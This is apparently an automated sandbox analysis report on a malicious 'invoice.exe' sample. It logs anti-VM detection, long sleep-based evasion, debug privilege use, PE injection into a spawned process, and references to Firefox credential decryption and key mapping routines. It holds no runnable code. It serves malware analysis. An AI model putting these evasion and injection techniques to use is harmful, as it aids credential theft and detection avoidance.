Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR

Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 16F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 3290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 8140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 9140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 92F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: A2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: A650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: B650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: C650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599355	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596952	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596842	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Window / User API: threadDelayed 1948			Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Window / User API: threadDelayed 7859			Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7744	Thread sleep count: 1948 > 30	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7744	Thread sleep count: 7859 > 30	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599355s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe TID: 7740	Thread sleep time: -593735s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599355	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596952	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596842	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: invoice.exe, 00000000.00000002.1714954987.0000000007B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: nXcvmCioUn

Source: C:\Users\user\Desktop\invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.invoice.exe.4e83658.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\invoice.exe

Memory written: C:\Users\user\Desktop\invoice.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Users\user\Desktop\invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
